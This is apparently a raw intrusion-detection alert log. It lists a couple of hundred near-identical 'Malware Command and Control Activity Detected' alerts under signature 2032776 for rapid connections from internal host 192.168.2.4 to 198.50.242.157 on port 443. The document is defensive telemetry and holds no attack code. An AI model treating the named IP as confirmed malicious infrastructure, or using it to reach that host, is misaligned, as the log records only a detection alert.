2025-01-11T20:08:04.950062+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50074	198.50.242.157	443	TCP
2025-01-11T20:08:04.951147+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50075	198.50.242.157	443	TCP
2025-01-11T20:08:04.952686+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50076	198.50.242.157	443	TCP
2025-01-11T20:08:04.953573+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50077	198.50.242.157	443	TCP
2025-01-11T20:08:04.954651+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50078	198.50.242.157	443	TCP
2025-01-11T20:08:04.955624+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50079	198.50.242.157	443	TCP
2025-01-11T20:08:04.956996+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50080	198.50.242.157	443	TCP
2025-01-11T20:08:04.957907+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50081	198.50.242.157	443	TCP
2025-01-11T20:08:04.958728+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50082	198.50.242.157	443	TCP
2025-01-11T20:08:04.959767+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50083	198.50.242.157	443	TCP
2025-01-11T20:08:04.961009+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50084	198.50.242.157	443	TCP
2025-01-11T20:08:04.962613+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50085	198.50.242.157	443	TCP
2025-01-11T20:08:04.963771+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50086	198.50.242.157	443	TCP
2025-01-11T20:08:04.965026+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50087	198.50.242.157	443	TCP
2025-01-11T20:08:04.965919+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50088	198.50.242.157	443	TCP
2025-01-11T20:08:04.967497+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50089	198.50.242.157	443	TCP
2025-01-11T20:08:04.969086+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50090	198.50.242.157	443	TCP
2025-01-11T20:08:04.970202+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50091	198.50.242.157	443	TCP
2025-01-11T20:08:04.971726+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50092	198.50.242.157	443	TCP
2025-01-11T20:08:04.973020+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50093	198.50.242.157	443	TCP
2025-01-11T20:08:04.974193+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50094	198.50.242.157	443	TCP
2025-01-11T20:08:04.975151+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50095	198.50.242.157	443	TCP
2025-01-11T20:08:04.976275+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50096	198.50.242.157	443	TCP
2025-01-11T20:08:04.977314+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50097	198.50.242.157	443	TCP
2025-01-11T20:08:04.978556+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50098	198.50.242.157	443	TCP
2025-01-11T20:08:04.979532+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50099	198.50.242.157	443	TCP
2025-01-11T20:08:04.981603+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50100	198.50.242.157	443	TCP
2025-01-11T20:08:04.982842+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50101	198.50.242.157	443	TCP
2025-01-11T20:08:04.983862+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50102	198.50.242.157	443	TCP
2025-01-11T20:08:04.985027+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50103	198.50.242.157	443	TCP
2025-01-11T20:08:04.986359+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50104	198.50.242.157	443	TCP
2025-01-11T20:08:04.987509+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50105	198.50.242.157	443	TCP
2025-01-11T20:08:04.988704+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50106	198.50.242.157	443	TCP
2025-01-11T20:08:04.989916+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50107	198.50.242.157	443	TCP
2025-01-11T20:08:04.991050+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50108	198.50.242.157	443	TCP
2025-01-11T20:08:04.992651+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50109	198.50.242.157	443	TCP
2025-01-11T20:08:04.993751+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50110	198.50.242.157	443	TCP
2025-01-11T20:08:04.994969+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50111	198.50.242.157	443	TCP
2025-01-11T20:08:04.996423+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50112	198.50.242.157	443	TCP
2025-01-11T20:08:04.997875+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50113	198.50.242.157	443	TCP
2025-01-11T20:08:04.999204+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50114	198.50.242.157	443	TCP
2025-01-11T20:08:05.001049+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50115	198.50.242.157	443	TCP
2025-01-11T20:08:05.002379+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50116	198.50.242.157	443	TCP
2025-01-11T20:08:05.003545+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50117	198.50.242.157	443	TCP
2025-01-11T20:08:05.005039+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50118	198.50.242.157	443	TCP
2025-01-11T20:08:05.006581+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50119	198.50.242.157	443	TCP
2025-01-11T20:08:05.007671+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50120	198.50.242.157	443	TCP
2025-01-11T20:08:05.010220+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50122	198.50.242.157	443	TCP
2025-01-11T20:08:05.011418+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50123	198.50.242.157	443	TCP
2025-01-11T20:08:05.012215+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50124	198.50.242.157	443	TCP
2025-01-11T20:08:05.013879+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50125	198.50.242.157	443	TCP
2025-01-11T20:08:05.015132+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50126	198.50.242.157	443	TCP
2025-01-11T20:08:05.017798+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50127	198.50.242.157	443	TCP
2025-01-11T20:08:05.019331+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50128	198.50.242.157	443	TCP
2025-01-11T20:08:05.020771+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50129	198.50.242.157	443	TCP
2025-01-11T20:08:05.023988+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50132	198.50.242.157	443	TCP
2025-01-11T20:08:05.025029+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50133	198.50.242.157	443	TCP
2025-01-11T20:08:05.026482+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50134	198.50.242.157	443	TCP
2025-01-11T20:08:05.027542+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50135	198.50.242.157	443	TCP
2025-01-11T20:08:05.029148+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50136	198.50.242.157	443	TCP
2025-01-11T20:08:05.030402+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50137	198.50.242.157	443	TCP
2025-01-11T20:08:05.031779+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50138	198.50.242.157	443	TCP
2025-01-11T20:08:05.033563+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50139	198.50.242.157	443	TCP
2025-01-11T20:08:05.034566+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50140	198.50.242.157	443	TCP
2025-01-11T20:08:05.035739+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50141	198.50.242.157	443	TCP
2025-01-11T20:08:05.036841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50142	198.50.242.157	443	TCP
2025-01-11T20:08:05.038414+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50143	198.50.242.157	443	TCP
2025-01-11T20:08:05.039790+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50144	198.50.242.157	443	TCP
2025-01-11T20:08:05.043362+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50145	198.50.242.157	443	TCP
2025-01-11T20:08:05.046858+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50146	198.50.242.157	443	TCP
2025-01-11T20:08:05.049385+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50147	198.50.242.157	443	TCP
2025-01-11T20:08:05.056078+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50148	198.50.242.157	443	TCP
2025-01-11T20:08:05.060299+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50149	198.50.242.157	443	TCP
2025-01-11T20:08:05.061759+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50150	198.50.242.157	443	TCP
2025-01-11T20:08:05.065822+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50151	198.50.242.157	443	TCP
2025-01-11T20:08:05.067161+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50152	198.50.242.157	443	TCP
2025-01-11T20:08:05.068680+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50153	198.50.242.157	443	TCP
2025-01-11T20:08:05.069979+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50154	198.50.242.157	443	TCP
2025-01-11T20:08:05.071425+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50155	198.50.242.157	443	TCP
2025-01-11T20:08:05.072274+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50156	198.50.242.157	443	TCP
2025-01-11T20:08:05.075342+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50158	198.50.242.157	443	TCP
2025-01-11T20:08:05.077095+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50159	198.50.242.157	443	TCP
2025-01-11T20:08:05.078037+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50160	198.50.242.157	443	TCP
2025-01-11T20:08:05.079349+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50161	198.50.242.157	443	TCP
2025-01-11T20:08:05.083479+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50164	198.50.242.157	443	TCP
2025-01-11T20:08:05.085624+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50165	198.50.242.157	443	TCP
2025-01-11T20:08:05.086692+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50166	198.50.242.157	443	TCP
2025-01-11T20:08:05.087602+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50167	198.50.242.157	443	TCP
2025-01-11T20:08:05.088836+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50168	198.50.242.157	443	TCP
2025-01-11T20:08:05.090173+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50169	198.50.242.157	443	TCP
2025-01-11T20:08:05.091301+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50170	198.50.242.157	443	TCP
2025-01-11T20:08:05.092332+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50171	198.50.242.157	443	TCP
2025-01-11T20:08:05.093199+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50172	198.50.242.157	443	TCP
2025-01-11T20:08:05.094255+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50173	198.50.242.157	443	TCP
2025-01-11T20:08:05.095644+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50174	198.50.242.157	443	TCP
2025-01-11T20:08:05.096994+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50175	198.50.242.157	443	TCP
2025-01-11T20:08:05.097925+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50176	198.50.242.157	443	TCP
2025-01-11T20:08:05.099099+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50177	198.50.242.157	443	TCP
2025-01-11T20:08:05.101002+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50178	198.50.242.157	443	TCP
2025-01-11T20:08:05.101973+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50179	198.50.242.157	443	TCP
2025-01-11T20:08:05.102962+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50180	198.50.242.157	443	TCP
2025-01-11T20:08:05.104068+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50181	198.50.242.157	443	TCP
2025-01-11T20:08:05.105560+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50182	198.50.242.157	443	TCP
2025-01-11T20:08:05.107049+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50183	198.50.242.157	443	TCP
2025-01-11T20:08:05.108027+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50184	198.50.242.157	443	TCP
2025-01-11T20:08:05.113071+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50185	198.50.242.157	443	TCP
2025-01-11T20:08:05.118394+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50187	198.50.242.157	443	TCP
2025-01-11T20:08:05.119440+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50188	198.50.242.157	443	TCP
2025-01-11T20:08:05.120994+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50189	198.50.242.157	443	TCP
2025-01-11T20:08:05.122101+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50190	198.50.242.157	443	TCP
2025-01-11T20:08:05.123457+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50191	198.50.242.157	443	TCP
2025-01-11T20:08:05.124510+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50192	198.50.242.157	443	TCP
2025-01-11T20:08:05.127871+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50193	198.50.242.157	443	TCP
2025-01-11T20:08:05.129030+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50194	198.50.242.157	443	TCP
2025-01-11T20:08:05.130082+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50195	198.50.242.157	443	TCP
2025-01-11T20:08:05.131483+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50196	198.50.242.157	443	TCP
2025-01-11T20:08:05.132547+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50197	198.50.242.157	443	TCP
2025-01-11T20:08:05.134148+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50198	198.50.242.157	443	TCP
2025-01-11T20:08:05.135050+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50199	198.50.242.157	443	TCP
2025-01-11T20:08:05.136297+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50200	198.50.242.157	443	TCP
2025-01-11T20:08:05.137877+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50201	198.50.242.157	443	TCP
2025-01-11T20:08:05.139420+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50202	198.50.242.157	443	TCP
2025-01-11T20:08:05.140370+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50203	198.50.242.157	443	TCP
2025-01-11T20:08:05.141655+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50204	198.50.242.157	443	TCP
2025-01-11T20:08:05.143099+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50205	198.50.242.157	443	TCP
2025-01-11T20:08:05.145607+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50207	198.50.242.157	443	TCP
2025-01-11T20:08:05.148106+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50208	198.50.242.157	443	TCP
2025-01-11T20:08:05.148993+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50209	198.50.242.157	443	TCP
2025-01-11T20:08:05.150480+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50210	198.50.242.157	443	TCP
2025-01-11T20:08:05.151794+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50211	198.50.242.157	443	TCP
2025-01-11T20:08:05.152794+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50212	198.50.242.157	443	TCP
2025-01-11T20:08:05.153942+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50213	198.50.242.157	443	TCP
2025-01-11T20:08:05.155081+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50214	198.50.242.157	443	TCP
2025-01-11T20:08:05.156140+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50215	198.50.242.157	443	TCP
2025-01-11T20:08:05.157688+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50216	198.50.242.157	443	TCP
2025-01-11T20:08:05.158540+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50217	198.50.242.157	443	TCP
2025-01-11T20:08:05.159591+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50218	198.50.242.157	443	TCP
2025-01-11T20:08:05.160988+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50219	198.50.242.157	443	TCP
2025-01-11T20:08:05.161886+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50220	198.50.242.157	443	TCP
2025-01-11T20:08:05.163200+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50221	198.50.242.157	443	TCP
2025-01-11T20:08:05.164575+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50222	198.50.242.157	443	TCP
2025-01-11T20:08:05.165512+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50223	198.50.242.157	443	TCP
2025-01-11T20:08:05.167006+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50224	198.50.242.157	443	TCP
2025-01-11T20:08:05.168436+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50225	198.50.242.157	443	TCP
2025-01-11T20:08:05.169433+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50226	198.50.242.157	443	TCP
2025-01-11T20:08:05.170441+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50227	198.50.242.157	443	TCP
2025-01-11T20:08:05.171451+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50228	198.50.242.157	443	TCP
2025-01-11T20:08:05.173823+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50230	198.50.242.157	443	TCP
2025-01-11T20:08:05.174747+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50231	198.50.242.157	443	TCP
2025-01-11T20:08:05.175930+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50232	198.50.242.157	443	TCP
2025-01-11T20:08:05.176977+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50233	198.50.242.157	443	TCP
2025-01-11T20:08:05.178241+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50234	198.50.242.157	443	TCP
2025-01-11T20:08:05.179658+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50235	198.50.242.157	443	TCP
2025-01-11T20:08:05.180563+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50236	198.50.242.157	443	TCP
2025-01-11T20:08:05.182000+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50237	198.50.242.157	443	TCP
2025-01-11T20:08:05.182987+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50238	198.50.242.157	443	TCP
2025-01-11T20:08:05.184498+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50239	198.50.242.157	443	TCP
2025-01-11T20:08:05.185655+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50240	198.50.242.157	443	TCP
2025-01-11T20:08:05.187870+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50242	198.50.242.157	443	TCP
2025-01-11T20:08:05.188929+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50243	198.50.242.157	443	TCP
2025-01-11T20:08:05.190528+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50244	198.50.242.157	443	TCP
2025-01-11T20:08:05.191812+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50245	198.50.242.157	443	TCP
2025-01-11T20:08:05.192987+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50246	198.50.242.157	443	TCP
2025-01-11T20:08:05.196212+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50247	198.50.242.157	443	TCP
2025-01-11T20:08:05.198048+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50248	198.50.242.157	443	TCP
2025-01-11T20:08:05.201168+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50250	198.50.242.157	443	TCP
2025-01-11T20:08:05.202436+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50251	198.50.242.157	443	TCP
2025-01-11T20:08:05.203980+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50252	198.50.242.157	443	TCP
2025-01-11T20:08:05.205276+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50253	198.50.242.157	443	TCP
2025-01-11T20:08:05.206972+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50254	198.50.242.157	443	TCP
2025-01-11T20:08:05.208051+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50255	198.50.242.157	443	TCP
2025-01-11T20:08:05.212225+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50256	198.50.242.157	443	TCP
2025-01-11T20:08:05.222896+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50257	198.50.242.157	443	TCP
2025-01-11T20:08:05.235572+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50258	198.50.242.157	443	TCP
2025-01-11T20:08:05.236720+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50259	198.50.242.157	443	TCP
2025-01-11T20:08:05.238288+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50260	198.50.242.157	443	TCP
2025-01-11T20:08:05.239475+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50261	198.50.242.157	443	TCP
2025-01-11T20:08:05.240821+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50262	198.50.242.157	443	TCP
2025-01-11T20:08:05.242149+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50263	198.50.242.157	443	TCP
2025-01-11T20:08:05.247772+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50266	198.50.242.157	443	TCP
2025-01-11T20:08:05.249390+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50267	198.50.242.157	443	TCP
2025-01-11T20:08:05.250364+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50268	198.50.242.157	443	TCP
2025-01-11T20:08:05.251443+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50269	198.50.242.157	443	TCP
2025-01-11T20:08:05.252717+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50270	198.50.242.157	443	TCP
2025-01-11T20:08:05.254325+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50271	198.50.242.157	443	TCP
2025-01-11T20:08:05.255283+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50272	198.50.242.157	443	TCP
2025-01-11T20:08:05.256784+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50273	198.50.242.157	443	TCP
2025-01-11T20:08:05.258325+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50274	198.50.242.157	443	TCP
2025-01-11T20:08:05.259675+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50275	198.50.242.157	443	TCP
2025-01-11T20:08:05.261041+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50276	198.50.242.157	443	TCP
2025-01-11T20:08:05.262183+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50277	198.50.242.157	443	TCP
2025-01-11T20:08:05.264580+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50279	198.50.242.157	443	TCP
2025-01-11T20:08:05.266174+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50280	198.50.242.157	443	TCP
2025-01-11T20:08:05.268313+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50281	198.50.242.157	443	TCP
2025-01-11T20:08:05.269057+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50282	198.50.242.157	443	TCP
2025-01-11T20:08:05.270262+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50283	198.50.242.157	443	TCP
2025-01-11T20:08:05.271076+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50284	198.50.242.157	443	TCP
2025-01-11T20:08:05.272932+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50285	198.50.242.157	443	TCP
2025-01-11T20:08:05.274086+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50286	198.50.242.157	443	TCP
2025-01-11T20:08:05.275139+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50287	198.50.242.157	443	TCP
2025-01-11T20:08:05.276418+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50288	198.50.242.157	443	TCP
2025-01-11T20:08:05.277451+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50289	198.50.242.157	443	TCP
2025-01-11T20:08:05.279246+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50290	198.50.242.157	443	TCP
2025-01-11T20:08:05.280476+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50291	198.50.242.157	443	TCP
2025-01-11T20:08:05.281522+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50292	198.50.242.157	443	TCP
2025-01-11T20:08:05.282542+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50293	198.50.242.157	443	TCP
2025-01-11T20:08:05.283443+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50294	198.50.242.157	443	TCP
2025-01-11T20:08:05.284800+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50295	198.50.242.157	443	TCP
2025-01-11T20:08:05.286354+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50296	198.50.242.157	443	TCP
2025-01-11T20:08:05.287887+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50297	198.50.242.157	443	TCP
2025-01-11T20:08:05.298095+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50298	198.50.242.157	443	TCP
2025-01-11T20:08:05.299787+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50299	198.50.242.157	443	TCP
2025-01-11T20:08:05.300753+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50300	198.50.242.157	443	TCP
2025-01-11T20:08:05.301830+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50301	198.50.242.157	443	TCP
2025-01-11T20:08:05.303380+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50302	198.50.242.157	443	TCP
2025-01-11T20:08:05.304920+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50303	198.50.242.157	443	TCP
2025-01-11T20:08:05.309015+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50304	198.50.242.157	443	TCP
2025-01-11T20:08:05.311453+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50305	198.50.242.157	443	TCP
2025-01-11T20:08:05.313003+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50306	198.50.242.157	443	TCP
2025-01-11T20:08:05.317087+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50308	198.50.242.157	443	TCP
2025-01-11T20:08:05.318013+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50309	198.50.242.157	443	TCP
2025-01-11T20:08:05.319915+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50310	198.50.242.157	443	TCP
2025-01-11T20:08:05.321295+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50311	198.50.242.157	443	TCP
2025-01-11T20:08:05.323352+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50312	198.50.242.157	443	TCP
2025-01-11T20:08:05.324981+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50313	198.50.242.157	443	TCP
2025-01-11T20:08:05.326997+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50314	198.50.242.157	443	TCP
2025-01-11T20:08:05.328279+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50315	198.50.242.157	443	TCP
2025-01-11T20:08:05.329630+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50316	198.50.242.157	443	TCP
2025-01-11T20:08:05.331111+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50317	198.50.242.157	443	TCP
2025-01-11T20:08:05.332677+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50318	198.50.242.157	443	TCP
